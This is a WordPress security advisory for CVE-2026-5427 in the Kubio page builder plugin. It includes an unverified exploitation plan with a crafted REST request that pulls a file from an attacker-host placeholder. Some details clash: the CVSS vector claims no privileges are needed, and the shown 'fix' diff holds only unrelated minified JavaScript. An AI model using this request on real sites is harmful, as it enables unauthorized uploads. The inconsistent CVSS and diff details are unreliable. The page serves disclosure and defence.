WP-Safety
CVE-2026-5427

Kubio AI Page Builder <= 2.7.2 - Missing Authorization to Authenticated (Contributor+) Limited File Upload via Kubio Block Attributes

mediumMissing Authorization
5.3
CVSS Score
5.3
CVSS Score
medium
Severity
2.7.3
Patched in
1d
Time to patch

Description

The Kubio plugin for WordPress is vulnerable to Arbitrary File Upload in versions up to and including 2.7.2. This is due to insufficient capability checks in the kubio_rest_pre_insert_import_assets() function, which is hooked to the rest_pre_insert_{post_type} filter for posts, pages, templates, and template parts. When a post is created or updated via the REST API, Kubio parses block attributes looking for URLs in the 'kubio' attribute namespace and automatically imports them via importRemoteFile() without verifying the user has the upload_files capability. This makes it possible for authenticated attackers with Contributor-level access and above to bypass WordPress's normal media upload restrictions and upload files fetched from external URLs to the media library, creating attachment posts in the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.7.2
PublishedApril 16, 2026
Last updatedApril 17, 2026
Affected pluginkubio

What Changed in the Fix

Changes introduced in v2.7.3

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v2.7.2
Browse source Download .zip
Patched v2.7.3
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-5427 - Kubio AI Page Builder Limited File Upload ## 1. Vulnerability Summary The Kubio AI Page Builder plugin (<= 2.7.2) contains a missing authorization vulnerability in its handling of remote assets during post creation or update. Specifically, the function …

Show full research plan

Exploitation Research Plan: CVE-2026-5427 - Kubio AI Page Builder Limited File Upload

1. Vulnerability Summary

The Kubio AI Page Builder plugin (<= 2.7.2) contains a missing authorization vulnerability in its handling of remote assets during post creation or update. Specifically, the function kubio_rest_pre_insert_import_assets() (inferred to be in the PHP backend, likely includes/rest/rest-api.php or similar) is hooked to the WordPress REST API filter rest_pre_insert_{post_type} (covering post, page, wp_template, and wp_template_part).

When a user with Contributor-level permissions or higher creates or updates a post via the REST API, Kubio parses the block content. If it finds a URL within the kubio attribute namespace of a block, it automatically triggers importRemoteFile() to fetch and sideload the file into the WordPress Media Library. The plugin fails to verify if the requesting user possesses the upload_files capability, allowing Contributors (who normally cannot upload files) to populate the media library and create attachment posts using external URLs.

2. Attack Vector Analysis

  • Endpoint: /wp-json/wp/v2/posts (or /wp-json/wp/v2/pages)
  • HTTP Method: POST
  • Authentication Required: Authenticated, Contributor-level or higher.
  • Vulnerable Parameter: content (containing Gutenberg block comments with Kubio-specific JSON attributes).
  • Payload Structure: A Gutenberg block comment for a Kubio block where the kubio attribute contains a URL.
  • Preconditions: The Kubio plugin must be active. The attacker must have a valid session cookie and a wp_rest nonce.

3. Code Flow

  1. Entry Point: An authenticated user sends a POST request to create/update a post via the WordPress REST API.
  2. Filter Trigger: WordPress executes rest_pre_insert_post.
  3. Plugin Hook: Kubio's kubio_rest_pre_insert_import_assets() is triggered.
  4. Parsing: The function iterates through the Gutenberg blocks in the post content.
  5. Attribute Detection: It looks for the kubio attribute key in the block's JSON metadata.
  6. Sideloading: If a URL is found in specific sub-keys (e.g., url, src, or within a background object), the plugin calls importRemoteFile().
  7. Sink: importRemoteFile() uses wp_remote_get() to fetch the file and wp_handle_sideload() (or similar) to save it to wp-content/uploads/ and create an attachment post.
  8. Missing Check: No call to current_user_can('upload_files') is made before the sideloading process begins.

4. Nonce Acquisition Strategy

REST API requests in WordPress require the wp_rest nonce for authenticated users.

  1. User Creation: Use WP-CLI to create a Contributor user.
  2. Login: Use browser_navigate and browser_type to log into /wp-login.php.
  3. Extraction: Navigate to the /wp-admin/ dashboard.
  4. Script Execution: Use browser_eval to extract the wp_rest nonce from the wpApiSettings global variable:
    • browser_eval("window.wpApiSettings?.nonce")
  5. Alternative: If wpApiSettings is unavailable, extract it from the post editor page:
    • browser_eval("wp.apiFetch.nonceMiddleware?.nonce")

5. Exploitation Strategy

Step 1: Prepare Remote File

Host a file (e.g., test-image.png) on an external server or a simple Python listener accessible by the WordPress instance.

Step 2: Craft the REST API Request

Send a request to create a new draft post containing a Kubio block.

Request Details:

  • URL: http://<target>/wp-json/wp/v2/posts
  • Method: POST
  • Headers:
    • Content-Type: application/json
    • X-WP-Nonce: <EXTRACTED_NONCE>
    • Cookie: <CONTRIBUTOR_COOKIES>
  • Body:
{
  "title": "Exploit Post",
  "status": "draft",
  "content": "<!-- wp:kubio/image {\"kubio\":{\"image\":{\"url\":\"http://<ATTACKER_IP>/test-image.png\"}}} --><div class=\"wp-block-kubio-image\"></div><!-- /wp:kubio/image -->"
}

Note: The exact nesting within the kubio attribute (e.g., {"image": {"url": "..."}}) is inferred from common Kubio block structures and may need adjustment based on real-time observation of the plugin's block format.

Step 3: Trigger the Upload

Submit the request. The server should return a 201 Created response.

6. Test Data Setup

  1. Plugin: Install and activate kubio version 2.7.2.
  2. User: wp user create attacker attacker@example.com --role=contributor --user_pass=password
  3. Remote Asset: Ensure a file is available at a reachable URL (e.g., http://attacker.local/poc.jpg).

7. Expected Results

  1. The REST API response confirms the post was created.
  2. During the post-processing, Kubio logs (if enabled) will show a request to the external URL.
  3. A new attachment post (type attachment) will be created in the wp_posts table.
  4. The file poc.jpg will exist in the /wp-content/uploads/YYYY/MM/ directory.

8. Verification Steps

After the HTTP request, verify success via WP-CLI:

  1. Check Attachments: wp post list --post_type=attachment
    • Expected: A new attachment titled "poc" or similar should appear.
  2. Check Metadata: wp post meta list <ATTACHMENT_ID>
    • Expected: Metadata such as _wp_attached_file should point to the newly downloaded file.
  3. Check Filesystem: ls -R /var/www/html/wp-content/uploads/
    • Expected: The file from the external URL should be present.

9. Alternative Approaches

If the wp:kubio/image block structure is incorrect:

  • Try Generic Kubio Block: Use <!-- wp:kubio/block {"kubio": {"url": "..."}} -->.
  • Try Background Attribute: Kubio often uses background settings. Try:
    "kubio": {"background": {"image": {"url": "..."}}}
  • Observe Legitimate Request: Use the browser_navigate tool to log in as an Admin, create a post with a Kubio image block, and use browser_eval or Network tab inspection to see the exact JSON structure the plugin expects.
  • Template Parts: Try hitting the /wp-json/wp/v2/templates or /wp-json/wp/v2/template-parts endpoints, as these are also listed as affected in the vulnerability description.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Kubio AI Page Builder plugin for WordPress (<= 2.7.2) allows authenticated users with Contributor-level access and above to sideload arbitrary files from remote URLs into the media library. This is due to a missing authorization check in the `kubio_rest_pre_insert_import_assets()` function, which automatically processes and imports URLs found within the 'kubio' block attribute namespace during REST API post operations.

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/kubio/2.7.2/build/block-editor/index.asset.php /home/deploy/wp-safety.org/data/plugin-versions/kubio/2.7.3/build/block-editor/index.asset.php
--- /home/deploy/wp-safety.org/data/plugin-versions/kubio/2.7.2/build/block-editor/index.asset.php	2025-12-02 12:24:44.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/kubio/2.7.3/build/block-editor/index.asset.php	2026-04-15 06:03:54.000000000 +0000
@@ -1 +1 @@
-<?php return array('dependencies' => array('kubio-constants', 'kubio-core-hooks', 'kubio-editor-data', 'kubio-icons', 'kubio-log', 'kubio-pro', 'kubio-utils', 'lodash', 'react', 'react-dom', 'wp-a11y', 'wp-api-fetch', 'wp-blob', 'wp-block-serialization-default-parser', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-notices', 'wp-polyfill', 'wp-preferences', 'wp-primitives', 'wp-priority-queue', 'wp-rich-text', 'wp-token-list', 'wp-url', 'wp-warning'), 'version' => '1f3a0b37498a8dcd8ea5');
+<?php return array('dependencies' => array('kubio-constants', 'kubio-core-hooks', 'kubio-editor-data', 'kubio-icons', 'kubio-log', 'kubio-pro', 'kubio-utils', 'lodash', 'react', 'react-dom', 'wp-a11y', 'wp-api-fetch', 'wp-blob', 'wp-block-serialization-default-parser', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-notices', 'wp-polyfill', 'wp-preferences', 'wp-primitives', 'wp-priority-queue', 'wp-rich-text', 'wp-token-list', 'wp-url', 'wp-warning'), 'version' => '4f8cf8b0e56aa0fddae9');
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/kubio/2.7.2/build/block-editor/index.js /home/deploy/wp-safety.org/data/plugin-versions/kubio/2.7.3/build/block-editor/index.js
--- /home/deploy/wp-safety.org/data/plugin-versions/kubio/2.7.2/build/block-editor/index.js	2025-12-02 12:24:44.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/kubio/2.7.3/build/block-editor/index.js	2026-04-15 06:03:54.000000000 +0000
@@ -12,7 +12,7 @@
 // translators: %s: area label
 (0,Je.__)("Change the %s","kubio"),e)})]})]})}},Rd={ALL_PAGES:"allPages",THIS_PAGE:"thisPage"};function Nd(e){return e?ue().cloneDeep(e).map((e=>{const t=Nd(e.innerBlocks);return{...e,innerBlocks:t}})):e}function Ad(e,t){let n=e.find((e=>(null==e?void 0:e.name)===t));return n||(e.forEach((e=>{if(n)return;(null==e?void 0:e.name)===t&&(n=e);const o=ue().get(e,"innerBlocks");if(Array.isArray(o)){const e=Ad(o,t);e&&(n=e)}})),n)}const Ld=window.kubio.editorData,Dd="kubio/templates";const Od=["header","footer","sidebar"];function zd({onClose:e=ue().noop,onSuccess:t=ue().noop,area:n,innerBlocks:o,isFSEFrontPageButDoesNotHaveFrontPageTemplate:i=!1}){const[l,r]=(0,u.useState)(Rd.THIS_PAGE),s=(0,d.useSelect)((e=>{var t,o;if(Od.includes(n))return n;const{getBlock:i}=e("core/block-editor"),{getEntityRecord:l,getCurrentTheme:r}=e("core"),s=null===(t=r())||void 0===t?void 0:t.stylesheet,a=i(n),c=l("postType","wp_template_part",`${s}//${null==a||null===(o=a.attributes)||void 0===o?void 0:o.slug}`);return null==c?void 0:c.area})),{onNewTemplate:a,pageTitle:p,isFrontPage:h}=function({type:e,innerBlocks:t,applyTemplateOn:n}){const{storeData:o={},computedData:i={}}=(0,d.useSelect)((e=>e(Dd).getTemplateData()),[]),{currentPage:l={},postId:r,postType:s,templates:a}=o,{configPerType:p={}}=i,{pageTitle:h,isFrontPage:g,getEntityRecords:m}=(0,d.useSelect)((e=>{var t;const{getEntityRecord:n,getEntityRecords:o,getEditedEntityRecord:i}=e("core"),l=n("postType",s,r),a=null==l||null===(t=l.title)||void 0===t?void 0:t.raw,c=i("root","site");return{pageTitle:a,isFrontPage:(null==c?void 0:c.page_on_front)==r,getEntityRecords:o}})),f=(0,u.useRef)(!1),v=(0,u.useRef)(!1),b=["kubio-full-width","full-width"],k=(0,u.useMemo)((()=>a.find((e=>b.includes(e.slug)))),[JSON.stringify(a)]),_=ue().get(p,e,{}),y=ue().get(_,"label","Part"),x=ue().get(_,"blockName"),{editEntityRecord:S,saveEntityRecord:w,saveEditedEntityRecord:C}=(0,d.useDispatch)("core"),{setPage:B}=(0,d.useDispatch)("kubio/edit-site"),{createErrorNotice:I,createSuccessNotice:j}=function(){const{createErrorNotice:e,createSuccessNotice:t}=(0,d.useDispatch)("core/notices");return{createSuccessNotice:(e,n)=>t(e,{type:"snackbar",...n}),createErrorNotice:(t,n)=>e(t,{type:"snackbar",...n})}}();function E(){throw"Error"}const T=(0,u.useRef)(),P=(0,Ld.useSetGlobalSessionProp)("ready"),M=()=>{clearTimeout(T.current),T.current=setTimeout((()=>{	P(!0)}),3e3)},R=async e=>{const{link:t}=l;let n;try{const e=new URL(t);e.searchParams.append("random",Math.random());const o=e.toString();n=(0,qn.getPathAndQueryString)(o)}catch(e){}finally{M()}await B({path:n,context:{postType:s,postId:r}},e)};return{onNewTemplate:async(o=`${h} template`)=>{try{var i;if(f.current)return;f.current=!0,clearTimeout(T.current),P(!1);const l=Nd((0,c.parse)(null==k||null===(i=k.content)||void 0===i?void 0:i.raw)),a={};let u,d,p,b=!1;if(g)p=!1,u=(0,Je.__)("Front Page","kubio"),d="front-page",a.kubio_template_source="kubio";else if(n===Rd.ALL_PAGES){const e=m("postType","wp_template",{per_page:-1}).find((e=>"page"===e.slug));if(e)return async function(e){var n;const o=Ad(Nd((0,c.parse)(null==e||null===(n=e.content)||void 0===n?void 0:n.raw)),x),i=ue().get(o,["attributes","slug"]),l=`${ue().get(o,["attributes","theme"])}//${i}`,a={content:(0,c.serialize)(t)};return await S("postType","wp_template_part",l,a),await C("postType","wp_template_part",l),await S("postType",s,r,{template:""}),await R(e),!0}(e);p=!1,u="Page",d="page",a.kubio_template_source="kubio",b=!0}else p=!0,u=o,d=`${s}-${u}`;let _=`${u}-${e}`;if(b)switch(e){case"header":_="header";break;case"footer":_="footer"}if(g)switch(e){case"header":_="front-header";break;case"footer":_="footer"}const B=await async function(){try{if(v.current)return;v.current=!0;const n=`${h} ${e}`,o={title:n,slug:n,area:e,kubio_template_source:"kubio-custom",content:(0,c.serialize)(t)};return await w("postType","wp_template_part",o)}catch(e){I((0,Je.sprintf)(// translators: %s: type label
 // translators: %s: type label
-(0,Je.__)("Could not create new %s. Please try again later","kubio"),y))}finally{v.current=!1}}();B||E();const M=ue().get(B,"slug"),N=Ad(l,x);ue().set(N,["attributes","slug"],M),p&&(a.kubio_template_source="kubio-custom");const A={title:u,slug:d,content:(0,c.serialize)(l),...a},L=await w("postType","wp_template",A);return L&&null!=L&&L.slug||E(),g||n===Rd.ALL_PAGES||await S("postType",s,r,{template:null==L?void 0:L.slug}),(b||g)&&await S("postType",s,r,{template:""}),await R(L),j((0,Je.__)("New template created successfully","kubio")),L}catch(e){M(),I((0,Je.__)("Could not create new template. Please try again later","kubio"))}finally{f.current=!1}},pageTitle:h,isFrontPage:g}}({type:s,innerBlocks:o,isFSEFrontPageButDoesNotHaveFrontPageTemplate:i,applyTemplateOn:l,setApplyTemplateOn:r}),g=h?Pd:Td,[m,f]=(0,u.useState)(g),v=()=>{e()},b=async n=>{e(),await a(n)&&t()};if((0,u.useEffect)((()=>{	i&&b()}),[i]),i)return null;const k=s,_=s===(0,Je.__)("header","kubio")?(0,Je.__)("footer","kubio"):(0,Je.__)("header","kubio"),y=function(e){switch(e){case Td:return(0,Je.__)("Apply for all pages?","kubio");case Pd:return(0,Je.__)("New template required","kubio")}}(m);return(0,At.jsx)(ne.Modal,{title:y,onRequestClose:v,children:(0,At.jsx)("div",{className:"kubio-inserter-ignore-click-outisde kubio-classic-theme-create-template-modal",children:(0,At.jsx)(Ed,{areaLabel:k,otherAreaLabel:_,onCloseModal:v,onInsert:b,pageTitle:p,applyTemplateOn:l,setApplyTemplateOn:r,currentStep:m,setStep:f,isFrontPage:h})})})}

Exploit Outline

1. Gain Contributor-level authenticated access to the target WordPress site. 2. Obtain the required REST API nonce (usually from the `wp-admin` source code or the `wpApiSettings` JavaScript variable). 3. Use the WordPress REST API to create a new draft post or update an existing one by sending a POST request to `/wp-json/wp/v2/posts`. 4. Within the `content` parameter, include a Kubio block (e.g., `wp:kubio/image`) that contains a remote URL inside the `kubio` JSON attribute object (e.g., `"kubio": {"image": {"url": "http://attacker-controlled-server.com/malicious-file.png"}}`). 5. The plugin's server-side logic will parse the block content, find the URL, and execute `importRemoteFile()` to download and sideload the file into the WordPress Media Library without verifying the user's `upload_files` capability.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/d8096f3c-e1a9-424f-af10-3e80212db985?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database